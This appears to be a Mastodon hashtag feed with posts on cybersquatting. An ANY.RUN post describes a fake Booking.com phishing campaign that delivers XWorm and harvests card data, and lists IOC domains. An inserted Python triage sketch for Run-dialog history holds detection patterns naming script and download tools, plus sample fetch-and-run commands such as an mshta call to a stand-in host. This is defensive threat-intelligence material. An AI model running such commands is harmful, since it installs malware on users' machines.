#cybersquatting

ANY.RUN

🚨 Fake Booking.com phishing pages used to deliver malware and steal data
⚠️ Attackers use #cybersquatting, mimicking Booking website to create legitimate-looking phishing pages that trick users into executing malicious actions.
Leveraging #ANYRUN's interactivity, security professionals can follow the entire infection chain and gather #IOCs.

👨‍💻 Case 1: The user is instructed to open the Run tool by pressing Win + R, then Ctrl + V to paste the script, and hit Enter. This sequence of actions executes a #malicious script that downloads and runs malware, in this case, #XWorm.
Take a look at the analysis: https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

🔍 TI Lookup request to find domains, IPs, and analysis sessions related to this campaign:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522mktoresp.com%255C%2522%2520AND%2520domainName:%255C%2522booking.*.%255C%2522%2522,%2522dateRange%2522:30%7D%20%20

🎯 Use this search query to find more examples of this fake #CAPTCHA technique and enhance your organization's security response:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522commandLine:%5C%2522

👨‍💻 Case 2: In this scenario, threat actors aim to steal victims’ banking information. It’s a typical phishing site that mimics Booking website and, after a few steps, prompts users to enter their card details to ‘verify’ their stay.
See example: https://app.any.run/tasks/87c49110-90ff-4833-8f65-af87e49fcc8d/?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice

📌 A key domain in this campaign, Iili[.]io, was also used by #Tycoon2FA #phishkit.
🔍 Use this TI Lookup query to find more examples:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=fake_booking&utm_content=linktoti&utm_term=060325#%7B%2522query%2522:%2522domainName:%255C%2522bzib.nelreports.net%255C%2522%2520AND%2520domainName:%255C%2522xpaywalletcdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522cdnjs.cloudflare.com%255C%2522%2520AND%2520domainName:%255C%2522xpaycdn.azureedge.net%255C%2522%2520AND%2520domainName:%255C%2522iili.io%255C%2522%2522,%2522dateRange%2522:180%7D%20

Investigate the latest #malware and #phishing attacks with #ANYRUN 🚀

#cybersecurity #infosec
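
The Win + R, Ctrl + V, Enter sequence described in Case 1 of the post above leaves a trace a responder can check: Windows records Run-dialog commands per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, each value ending in `\1`. The following triage sketch is an added example, not part of the post or of ANY.RUN's tooling; the sample values, the trait names and the `example.invalid` host are constructed for illustration.

```python
import re

# Script hosts and download-capable tools a pasted Run-dialog command may invoke.
INTERPRETERS = re.compile(
    r"(?i)\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|bitsadmin)(\.exe)?\b")
# Traits that separate a fetch-and-run one-liner from routine use (assumed heuristics).
TRAITS = {
    "remote_url": re.compile(r"(?i)\bhttps?://"),
    "hidden_window": re.compile(r"(?i)(?<!\S)-w\w*\s+(h\w*|1)\b"),
    "encoded_command": re.compile(r"(?i)(?<!\S)-(e|ec|enc\w*)\s+\S"),
}

# Constructed RunMRU value data (not taken from the campaign); MRUList gives recency order.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd /c ping 10.0.0.1\\1",
    "c": "mshta https://example.invalid/captcha-check\\1",
    "d": "powershell -w hidden -enc <BASE64_PLACEHOLDER>\\1",
}

def parse_runmru(values):
    """Return Run-dialog commands, most recent first, with the trailing '\\1' removed."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is not None:
            commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands

def flag_command(cmd):
    """Return sorted trait names when cmd starts an interpreter with risky traits."""
    if not INTERPRETERS.search(cmd):
        return []
    return sorted(name for name, rx in TRAITS.items() if rx.search(cmd))

def audit(values):
    """Return (command, traits) pairs worth an analyst's attention, most recent first."""
    return [(c, t) for c in parse_runmru(values) if (t := flag_command(c))]

if __name__ == "__main__":
    for cmd, traits in audit(SAMPLE_RUNMRU):
        print(f"{','.join(traits):32} {cmd}")
```

On a live Windows host the same dictionary can be filled from the registry key above with the standard-library `winreg` module; an empty result does not clear the host, since the key can be edited or cleared.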

Stefan Bohacek

Interesting story from @tedium about an extortion scheme targeting prominent personalities on Bluesky who don't own their own domain.

"Cybersquatting is not a new issue, of course, but Bluesky’s decision to tie verification to domains as social proof shows the limitations of the strategy."

https://tedium.co/2024/12/17/bluesky-impersonation-risks/

I wonder how this would play out in the fediverse.

#bluesky #fediverse #domains #verification #cybersquatting